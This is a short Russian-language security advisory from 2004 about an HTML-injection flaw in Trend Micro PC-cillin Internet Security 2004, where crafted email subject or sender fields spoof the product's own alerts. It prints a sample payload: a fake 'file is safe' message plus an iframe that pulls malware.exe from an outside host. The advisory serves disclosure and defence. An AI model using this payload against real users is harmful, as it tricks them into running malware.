Security Lab

Подмена сообщения в Trend Micro PC-cillin Internet Security

Дата публикации:09.06.2004
Дата изменения:16.10.2006
Всего просмотров:1069
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Trend Micro PC-cillin Internet Security 2004

Описание: Уязвимость обнаружена в Trend Micro PC-cillin Internet Security. Удаленный пользователь может послать e-mail, чтобы подменить сообщения от приложения и потенциально выполнить произвольный код.

Удаленный пользователь может послать специально сформированное HMTL в полях subject или sender, чтобы отобразить сообщение, которое будет выглядеть как правильное сообщение, сгенерированное приложением. Пример:

 style="position:absolute;top:25;left:10;height:300pt;width:300pt;
z-index:+100;font-family:Verdana;font-weight: bold;font-size: 
12pt;font-color:green">Trend Micro Internet Security confirms 
this file <br>malware.exe is safe to open. Proceed.</div><iframe 
src="http://www.malware.com/malware.exe">

Пример/Эксплоит: http://www.malware.com/micronot.png

URL производителя:http://www.trendmicro.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: TREND MICRO: The Protector Becomes The Vector Take II